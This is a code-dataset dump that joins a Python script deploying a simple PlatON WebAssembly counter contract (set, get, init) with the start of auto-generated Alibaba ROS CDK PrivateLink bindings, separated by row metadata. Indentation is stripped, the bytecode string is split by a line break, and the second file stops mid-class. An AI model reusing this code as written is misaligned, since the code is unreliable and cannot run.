bytecode='0061736d0100000001470d60017f017f60027f7f0060000060017f0060037f7f7f0060047f7f7f7f0060027f7f017f60037f7f7f017f60047f7f7f7f017f60017f017e60027f7e006000017f60017e017f02a9010703656e760c706c61746f6e5f70616e6963000203656e7617706c61746f6e5f6765745f696e7075745f6c656e677468000b03656e7610706c61746f6e5f6765745f696e707574000303656e7617706c61746f6e5f6765745f73746174655f6c656e677468000603656e7610706c61746f6e5f6765745f7374617465000803656e7610706c61746f6e5f7365745f7374617465000503656e760d706c61746f6e5f72657475726e000103201f0202000704090903000300000c010a020803000001070106010104020000050405017001010105030100020608017f0141b088040b073904066d656d6f72790200115f5f7761736d5f63616c6c5f63746f727300070f5f5f66756e63735f6f6e5f65786974001606696e766f6b6500080ad02a1f040010220b940202047f017e230041d0006b22012400102210012200100922021002200141386a200141086a20022000100a22004100100b02400240200141386a100c2204500d00418008100d20045104402000100e200141386a100f10100c020b418508100d200451044020001011410247044010000b200141386a20004101100b200141386a100c2104200141386a100f210020012004370348200010100c020b418908100d2004520d002000100e200141206a100f210220012903302104200141386a10122200200410131014200020041015200028020c200041106a28020047044010000b200028020020002802041006200028020c22030440200020033602100b200210100c010b10000b1016200141d0006a24000b9b0101047f230041106b220124002001200036020c2000047f41a408200041086a2202411076220041a4082802006a220336020041a00841a008280200220420026a41076a417871220236020002400240200341107420024d044041a408200341016a360200200041016a21000c010b2000450d010b200040000d0010000b20042001410c6a4104101c41086a0541000b2100200141106a240020000b0c00200020012002411c10170bc90202067f017e230041106b220324002001280208220520024b0440200341086a2001101d20012003280208200328020c101e36020c20032001101d410021052001027f410020032802002207450d001a410020032802042208200128020c2206490d001a200820062006417f461b210420070b360210200141146a2004360200200141003602080b200141106a210603402001280214210402402005200249044020040d01410021040b200020062802002004411410171a200341106a24000f0b20032001101d41002104027f410020032802002205450d001a410020032802042208200128020c2207490d001a200820076b2104200520076a0b2105200120043602142001200536021020032006410020052004101e10252001200329030022093702102001200128020c2009422088a76a36020c2001200128020841016a22053602080c000b000bad0302057f017e20001018024002402000280204450d00200010180240200028020022012c0000220241004e044020020d010c020b200241807f460d00200241ff0171220341b7014d0440200028020441014d04401000200028020021010b20012d00010d010c020b200341bf014b0d012000280204200241ff017141ca7e6a22024d04401000200028020021010b200120026a2d0000450d010b2000280204450d0020012d000041c001490d010b10000b200010192204200028020422014b04401000200028020421010b20002802002105024002400240200104404100210320052c00002200417f4a0d01027f200041ff0171220341bf014d04404100200041ff017141b801490d011a200341c97e6a0c010b4100200041ff017141f801490d001a200341897e6a0b41016a21030c010b4101210320050d00410021000c010b41002100200320046a20014b0d0020012004490d004100210220012003490d01200320056a2102200120036b20042004417f461b22004109490d0110000c010b410021020b0340200004402000417f6a210020023100002006420886842106200241016a21020c010b0b20060b3901027e42a5c688a1c89ca7f94b210103402000300000220250450440200041016a2100200142b383808080207e20028521010c010b0b20010b0e0020001011410147044010000b0bda0101077f230041306b22052400200042d1f0fad48ae09ad34537030820004200370300200541186a1012220220002903081015200228020c200241106a28020047044010000b02400240200228020022062002280204220710032204450d002004101a21030340200120036a41003a0
0002004200141016a2201470d000b20062007200320011004417f460d0020002005200341016a200120036a2003417f736a100a100c3703100c010b410021040b200228020c22010440200220013602100b2004450440200020002903003703100b200541306a240020000bb40201097f230041306b22032400200341186a10122202200029030810131014200220002903081015200228020c200241106a28020047044010000b20022802042105200228020021062003101221012000290310101321074101101a220441fe013a0000200128020c200141106a28020047044010000b2001280204220841016a220920012802084b047f20012009101b20012802040520080b20012802006a20044101101c1a2001200128020441016a3602042001200441016a200720046b6a10142001200029031010150240200128020c2001280210460440200128020021000c010b100020012802002100200128020c2001280210460d0010000b20062005200020012802041005200128020c22000440200120003602100b200228020c22010440200220013602100b200341306a24000b800101047f230041106b2201240002402000280204450d0020002802002d000041c001490d00200141086a2000101d200128020c210003402000450d01200141002001280208220320032000101e22046a20034520002004497222031b3602084100200020046b20031b2100200241016a21020c000b000b200141106a240020020b2900200041003602082000420037020020004100101b200041146a41003602002000420037020c20000b7002027f017e4101210120004280015a047f41002101034020002003845045044020034238862000420888842100200141016a2101200342088821030c010b0b024020014138490d002001210203402002450d01200141016a2101200241087621020c000b000b200141016a0520010b0b13002000280208200149044020002001101b0b0bc10402057f027e024020015004402000418001101f0c010b20014280015a044020012108034020072008845045044020074238862008420888842108200241016a2102200742088821070c010b0b0240200241384f04402002210403402004044020044108762104200341016a21030c010b0b200341c9004f044010000b2000200341b77f6a41ff0171101f2000200028020420036a1020200028020420002802006a417f6a21032002210403402004450d02200320043a0000200441087621042003417f6a21030c000b000b200020024180017341ff0171101f0b2000200028020420026a1020200028020420002802006a417f6a21024200210703402001200784500d02200220013c0000200742388620014208888421012002417f6a2102200742088821070c000b000b20002001a741ff0171101f0b0340024020002802102202200028020c460d00200241786a2802004504401000200028021021020b200241786a22042004280200417f6a220336020020030d002000200436021041002104200028020422062002417c6a28020022056b2203210203402002044020024108762102200441016a21040c010b0b20004101200441016a20034138491b220220066a1020200028020020056a220620026a200620031021200341374d0440200028020020056a200341406a3a00000c020b200441084d0440200028020020056a200441776a3a0000200028020020056a20046a210203402003450d03200220033a0000200341087621032002417f6a21020c000b000510000c020b000b0b0b880101037f4190084101360200419408280200210003402000044003404198084198082802002201417f6a220236020020014101484504404190084100360200200020024102746a22004184016a280200200041046a280200110300419008410136020041940828020021000c010b0b4198084120360200419408200028020022003602000c010b0b0b730020004200370210200042ffffffff0f370208200020023602042000200136020002402003410871450d002000102320024f0d002003410471044010000c010b200042003702000b02402003411071450d002000102320024d0d0020034104710440100020000f0b200042003702000b20000b4101017f200028020445044010000b0240200028020022012d0000418101470d00200028020441014d047f100020002802000520010b2c00014100480d0010000b0bff0201037f200028020445044041000f0b2000101841012102024020002802002c00002201417f4a0d00200141ff0171220341b7014d0440200341807f6a0f0b02400240200141ff0171220141bf014d0440024020002802042201200341c97e6a22024d047f100020002802040520010b4102490d0020002802002d00010d0010000b200241054f044010000b20002802002d000145044010000b41
00210241b7012101034020012003460440200241384f0d030c0405200028020020016a41ca7e6a2d00002002410874722102200141016a21010c010b000b000b200141f7014d0440200341c07e6a0f0b024020002802042201200341897e6a22024d047f100020002802040520010b4102490d0020002802002d00010d0010000b200241054f044010000b20002802002d000145044010000b4100210241f701210103402001200346044020024138490d0305200028020020016a418a7e6a2d00002002410874722102200141016a21010c010b0b0b200241ff7d490d010b10000b20020b0b002000410120001b10090b2f01017f200028020820014904402001100920002802002000280204101c210220002001360208200020023602000b0bfc0801067f03400240200020046a2105200120046a210320022004460d002003410371450d00200520032d00003a0000200441016a21040c010b0b200220046b210602402005410371220745044003402006411049450440200020046a2203200120046a2205290200370200200341086a200541086a290200370200200441106a2104200641706a21060c010b0b027f2006410871450440200120046a2103200020046a0c010b200020046a2205200120046a2204290200370200200441086a2103200541086a0b21042006410471044020042003280200360200200341046a2103200441046a21040b20064102710440200420032f00003b0000200341026a2103200441026a21040b2006410171450d01200420032d00003a000020000f0b024020064120490d002007417f6a220741024b0d00024002400240024002400240200741016b0e020102000b2005200120046a220328020022073a0000200541016a200341016a2f00003b0000200041036a2108200220046b417d6a2106034020064111490d03200420086a2203200120046a220541046a2802002202410874200741187672360200200341046a200541086a2802002207410874200241187672360200200341086a2005410c6a28020022024108742007411876723602002003410c6a200541106a2802002207410874200241187672360200200441106a2104200641706a21060c000b000b2005200120046a220328020022073a0000200541016a200341016a2d00003a0000200041026a2108200220046b417e6a2106034020064112490d03200420086a2203200120046a220541046a2802002202411074200741107672360200200341046a200541086a2802002207411074200241107672360200200341086a2005410c6a28020022024110742007411076723602002003410c6a200541106a2802002207411074200241107672360200200441106a2104200641706a21060c000b000b2005200120046a28020022073a0000200041016a21082004417f7320026a2106034020064113490d03200420086a2203200120046a220541046a2802002202411874200741087672360200200341046a200541086a2802002207411874200241087672360200200341086a2005410c6a28020022024118742007410876723602002003410c6a200541106a2802002207411874200241087672360200200441106a2104200641706a21060c000b000b200120046a41036a2103200020046a41036a21050c020b200120046a41026a2103200020046a41026a21050c010b200120046a41016a2103200020046a41016a21050b20064110710440200520032d00003a00002005200328000136000120052003290005370005200520032f000d3b000d200520032d000f3a000f200541106a2105200341106a21030b2006410871044020052003290000370000200541086a2105200341086a21030b2006410471044020052003280000360000200541046a2105200341046a21030b20064102710440200520032f00003b0000200541026a2105200341026a21030b2006410171450d00200520032d00003a00000b20000b2101017f20011019220220012802044b044010000b2000200120011024200210250b2701017f230041206b22022400200241086a200020014114101710232100200241206a240020000b3f01027f2000280204220241016a220320002802084b047f20002003101b20002802040520020b20002802006a20013a00002000200028020441016a3602040b0f0020002001101b200020013602040b8d0301037f024020002001460d00200120006b20026b410020024101746b4d0440200020012002101c1a0c010b20002001734103712103027f024020002001490440200020030d021a410021030340200120036a2105200020036a2204410371450440200220036b210241002103034020024104490d04200320046a200320056a280200360200200341046a21032002417c6a21020c000b000b20022003460d04200420052d00003a0000200341016a21030c000b000b024
020030d002001417f6a21040340200020026a22034103714504402001417c6a21032000417c6a2104034020024104490d03200220046a200220036a2802003602002002417c6a21020c000b000b2002450d042003417f6a200220046a2d00003a00002002417f6a21020c000b000b2001417f6a210103402002450d03200020026a417f6a200120026a2d00003a00002002417f6a21020c000b000b200320056a2101200320046a0b210303402002450d01200320012d00003a00002002417f6a2102200341016a2103200141016a21010c000b000b0b3501017f230041106b220041b0880436020c419c08200028020c41076a417871220036020041a008200036020041a4083f003602000b2e01017f200028020445044041000f0b4101210120002802002c0000417f4c047f20001024200010196a0520010b0b5b00027f027f41002000280204450d001a410020002802002c0000417f4a0d011a20002802002d0000220041bf014d04404100200041b801490d011a200041c97e6a0c010b4100200041f801490d001a200041897e6a0b41016a0b0b5b01027f2000027f0240200128020022054504400c010b200220036a200128020422014b0d0020012002490d00410020012003490d011a200220056a2104200120026b20032003417f461b0c010b41000b360204200020043602000b0b1301004180080b0c696e69740073657400676574'
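# Note (added): both bytecode blobs are hex-encoded WebAssembly modules; they
# begin with the WASM magic number "\0asm" (0061736d) followed by the version
# field 01000000.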
abi=[{"constant":false,"input":[{"name":"input","type":"uint64"}],"name":"set","output":"void","type":"Action"},{"constant":false,"input":[],"name":"init","output":"void","type":"Action"},{"constant":true,"input":[],"name":"get","output":"uint64","type":"Action"}]
print(type(abi))
# Instantiate and deploy contract
Payable = platon.wasmcontract(abi=abi, bytecode=bytecode, vmtype=1)
tx_hash = Payable.constructor().transact(
{
'from':from_address,
'gas':1500000,
}
)
# Wait for the transaction to be mined, and get the transaction receipt
tx_receipt = platon.waitForTransactionReceipt(tx_hash)
print(tx_receipt)
# Create the contract instance with the newly-deployed address
payable = platon.wasmcontract(address=tx_receipt.contractAddress, abi=abi, vmtype=1)
tx_hash1 = payable.functions.set(10).transact(
{
'from':from_address,
'gas':1500000,
}
)
# Wait for the transaction to be mined, and get the transaction receipt
tx_receipt = platon.waitForTransactionReceipt(tx_hash1)
print(tx_receipt)
# hrpgot, data = bech32.decode("lax", from_address)
# address = to_checksum_address(bytes(data))
# print(address)
address = "lax1yjjzvjph3tw4h2quw6mse25y492xy7fzwdtqja"
# Display the value stored in the contract
print('get : {}'.format(
payable.functions.get().call()
))
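
The deploy / wait-for-receipt / call sequence above is the whole protocol. A minimal sketch wrapping it as a reusable helper — it only reuses calls that already appear in this script (``wasmcontract``, ``constructor().transact``, ``waitForTransactionReceipt``, ``functions``); the name ``deploy_wasm`` itself is hypothetical:

```python
def deploy_wasm(platon, abi, bytecode, sender, gas=1500000):
    """Deploy a WASM contract and return an instance bound to its address."""
    contract = platon.wasmcontract(abi=abi, bytecode=bytecode, vmtype=1)
    tx_hash = contract.constructor().transact({'from': sender, 'gas': gas})
    receipt = platon.waitForTransactionReceipt(tx_hash)
    return platon.wasmcontract(address=receipt.contractAddress, abi=abi, vmtype=1)

# e.g. counter = deploy_wasm(platon, abi, bytecode, from_address)
#      counter.functions.set(10).transact({'from': from_address, 'gas': 1500000})
#      print(counter.functions.get().call())
```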
[row metadata — avg_line_length: 564.851351 | max_line_length: 26,735 | alphanum_fraction: 0.979736; the remaining numeric quality-signal columns are omitted]

---- next dataset row ----
hexsha: d75b5508ec480c28503bcacb56ebe36b393f0827 | size: 70,197 | ext: py | lang: Python
max_stars_repo: multiple-languages/python/ros-cdk-privatelink-1.0.4/src/ros_cdk_privatelink/__init__.py @ piotr-kalanski/Resource-Orchestration-Service-Cloud-Development-Kit (2a12deea757ac69e69708dd9fd159fba12cfba0e, ["Apache-2.0"]) | stars: null
max_issues_repo: same path / repo / hexsha / license | issues: null
max_forks_repo: same path / repo / hexsha / license | forks: null
content:
'''
## Aliyun ROS PRIVATELINK Construct Library
This module is part of the AliCloud ROS Cloud Development Kit (ROS CDK) project.
```python
import ros_cdk_privatelink as PRIVATELINK
```
'''
import abc
import builtins
import datetime
import enum
import typing
import jsii
import publication
import typing_extensions
from ._jsii import *
import ros_cdk_core
class RosVpcEndpoint(
ros_cdk_core.RosResource,
metaclass=jsii.JSIIMeta,
jsii_type="@alicloud/ros-cdk-privatelink.RosVpcEndpoint",
):
'''A ROS template type: ``ALIYUN::PrivateLink::VpcEndpoint``.'''
def __init__(
self,
scope: ros_cdk_core.Construct,
id: builtins.str,
props: "RosVpcEndpointProps",
enable_resource_property_constraint: builtins.bool,
) -> None:
'''Create a new ``ALIYUN::PrivateLink::VpcEndpoint``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param enable_resource_property_constraint: -
'''
jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="ROS_RESOURCE_TYPE_NAME")
def ROS_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "ROS_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrBandwidth")
def attr_bandwidth(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: Bandwidth: The bandwidth of the endpoint.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrBandwidth"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrEndpointDomain")
def attr_endpoint_domain(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: EndpointDomain: The domain name of the endpoint.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrEndpointDomain"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrEndpointId")
def attr_endpoint_id(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: EndpointId: The ID of the endpoint.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrEndpointId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrEndpointName")
def attr_endpoint_name(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: EndpointName: The name of the endpoint.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrEndpointName"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceId")
def attr_service_id(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ServiceId: The ID of the endpoint service that is associated with the endpoint.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceName")
def attr_service_name(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ServiceName: The name of the endpoint service that is associated with the endpoint.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceName"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrVpcId")
def attr_vpc_id(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: VpcId: The VPC ID of the endpoint.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrVpcId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrZoneDomains")
def attr_zone_domains(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ZoneDomains: The zone domains.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrZoneDomains"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="rosProperties")
def _ros_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "rosProperties"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="enableResourcePropertyConstraint")
def enable_resource_property_constraint(self) -> builtins.bool:
return typing.cast(builtins.bool, jsii.get(self, "enableResourcePropertyConstraint"))
@enable_resource_property_constraint.setter
def enable_resource_property_constraint(self, value: builtins.bool) -> None:
jsii.set(self, "enableResourcePropertyConstraint", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="securityGroupId")
def security_group_id(
self,
) -> typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]:
'''
:Property: securityGroupId: The security group associated with the endpoint network interface. The security group can control the data communication from the VPC to the endpoint network interface.
'''
return typing.cast(typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]], jsii.get(self, "securityGroupId"))
@security_group_id.setter
def security_group_id(
self,
value: typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]],
) -> None:
jsii.set(self, "securityGroupId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="vpcId")
def vpc_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: vpcId: The VPC to which the endpoint belongs.
'''
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], jsii.get(self, "vpcId"))
@vpc_id.setter
def vpc_id(
self,
value: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
jsii.set(self, "vpcId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="endpointDescription")
def endpoint_description(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property:
endpointDescription: The description of the endpoint.
The description must be 2 to 256 characters in length and cannot start with http:// or https://.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "endpointDescription"))
@endpoint_description.setter
def endpoint_description(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "endpointDescription", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="endpointName")
def endpoint_name(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property:
endpointName: The name of the endpoint.
The name must be 2 to 128 characters in length and can contain digits, underscores
(_), and hyphens (-). The name must start with a letter.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "endpointName"))
@endpoint_name.setter
def endpoint_name(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "endpointName", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="serviceId")
def service_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: serviceId: The endpoint service that is associated with the endpoint. One of ServiceId and ServiceName is required.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "serviceId"))
@service_id.setter
def service_id(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "serviceId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="serviceName")
def service_name(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: serviceName: The name of the endpoint service that is associated with the endpoint. One of ServiceId and ServiceName is required.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "serviceName"))
@service_name.setter
def service_name(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "serviceName", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="zone")
def zone(
self,
) -> typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, "RosVpcEndpoint.ZoneProperty"]]]]:
'''
:Property: zone:
'''
return typing.cast(typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, "RosVpcEndpoint.ZoneProperty"]]]], jsii.get(self, "zone"))
@zone.setter
def zone(
self,
value: typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, "RosVpcEndpoint.ZoneProperty"]]]],
) -> None:
jsii.set(self, "zone", value)
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-privatelink.RosVpcEndpoint.ZoneProperty",
jsii_struct_bases=[],
name_mapping={"v_switch_id": "vSwitchId", "zone_id": "zoneId"},
)
class ZoneProperty:
def __init__(
self,
*,
v_switch_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
zone_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
'''
:param v_switch_id:
:param zone_id:
'''
self._values: typing.Dict[str, typing.Any] = {
"v_switch_id": v_switch_id,
"zone_id": zone_id,
}
@builtins.property
def v_switch_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: vSwitchId: The vSwitch of the endpoint network interface in the given zone.
'''
result = self._values.get("v_switch_id")
assert result is not None, "Required property 'v_switch_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def zone_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: zoneId: The zone of the associated endpoint service.
'''
result = self._values.get("zone_id")
assert result is not None, "Required property 'zone_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "ZoneProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-privatelink.RosVpcEndpointProps",
jsii_struct_bases=[],
name_mapping={
"security_group_id": "securityGroupId",
"vpc_id": "vpcId",
"endpoint_description": "endpointDescription",
"endpoint_name": "endpointName",
"service_id": "serviceId",
"service_name": "serviceName",
"zone": "zone",
},
)
class RosVpcEndpointProps:
def __init__(
self,
*,
security_group_id: typing.Union[ros_cdk_core.IResolvable, typing.Sequence[typing.Union[builtins.str, ros_cdk_core.IResolvable]]],
vpc_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
endpoint_description: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
endpoint_name: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
service_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
service_name: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
zone: typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.Sequence[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpoint.ZoneProperty]]]] = None,
) -> None:
'''Properties for defining an ``ALIYUN::PrivateLink::VpcEndpoint``.
:param security_group_id:
:param vpc_id:
:param endpoint_description:
:param endpoint_name:
:param service_id:
:param service_name:
:param zone:
'''
self._values: typing.Dict[str, typing.Any] = {
"security_group_id": security_group_id,
"vpc_id": vpc_id,
}
if endpoint_description is not None:
self._values["endpoint_description"] = endpoint_description
if endpoint_name is not None:
self._values["endpoint_name"] = endpoint_name
if service_id is not None:
self._values["service_id"] = service_id
if service_name is not None:
self._values["service_name"] = service_name
if zone is not None:
self._values["zone"] = zone
@builtins.property
def security_group_id(
self,
) -> typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]:
'''
:Property: securityGroupId: The security group associated with the endpoint network interface. The security group can control the data communication from the VPC to the endpoint network interface.
'''
result = self._values.get("security_group_id")
assert result is not None, "Required property 'security_group_id' is missing"
return typing.cast(typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]], result)
@builtins.property
def vpc_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: vpcId: The VPC to which the endpoint belongs.
'''
result = self._values.get("vpc_id")
assert result is not None, "Required property 'vpc_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def endpoint_description(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property:
endpointDescription: The description of the endpoint.
The description must be 2 to 256 characters in length and cannot start with http:// or https://.
'''
result = self._values.get("endpoint_description")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def endpoint_name(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property:
endpointName: The name of the endpoint.
The name must be 2 to 128 characters in length and can contain digits, underscores
(_), and hyphens (-). The name must start with a letter.
'''
result = self._values.get("endpoint_name")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def service_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: serviceId: The endpoint service that is associated with the endpoint. One of ServiceId and ServiceName is required.
'''
result = self._values.get("service_id")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def service_name(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: serviceName: The name of the endpoint service that is associated with the endpoint. One of ServiceId and ServiceName is required.
'''
result = self._values.get("service_name")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def zone(
self,
) -> typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpoint.ZoneProperty]]]]:
'''
:Property: zone:
'''
result = self._values.get("zone")
return typing.cast(typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpoint.ZoneProperty]]]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "RosVpcEndpointProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
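# --- Illustrative sketch (not part of the generated bindings) ---
# A minimal construction of RosVpcEndpointProps. Only the two required
# properties are mandatory; per the docstrings above, one of service_id /
# service_name should also be set. All IDs below are hypothetical placeholders.
def _example_ros_vpc_endpoint_props() -> "RosVpcEndpointProps":
    return RosVpcEndpointProps(
        security_group_id=["sg-hypothetical0001"],  # a list of security group IDs (or an IResolvable)
        vpc_id="vpc-hypothetical0001",              # the VPC the endpoint belongs to
        service_id="epsrv-hypothetical0001",        # identifies the associated endpoint service
    )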
class RosVpcEndpointService(
ros_cdk_core.RosResource,
metaclass=jsii.JSIIMeta,
jsii_type="@alicloud/ros-cdk-privatelink.RosVpcEndpointService",
):
'''A ROS template type: ``ALIYUN::PrivateLink::VpcEndpointService``.'''
def __init__(
self,
scope: ros_cdk_core.Construct,
id: builtins.str,
props: "RosVpcEndpointServiceProps",
enable_resource_property_constraint: builtins.bool,
) -> None:
'''Create a new ``ALIYUN::PrivateLink::VpcEndpointService``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param enable_resource_property_constraint: -
'''
jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="ROS_RESOURCE_TYPE_NAME")
def ROS_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "ROS_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrMaxBandwidth")
def attr_max_bandwidth(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: MaxBandwidth: The maximum bandwidth of the endpoint connection.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrMaxBandwidth"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrMinBandwidth")
def attr_min_bandwidth(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: MinBandwidth: The minimum bandwidth of the endpoint connection.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrMinBandwidth"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceDescription")
def attr_service_description(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ServiceDescription: The description of the endpoint service.
'''
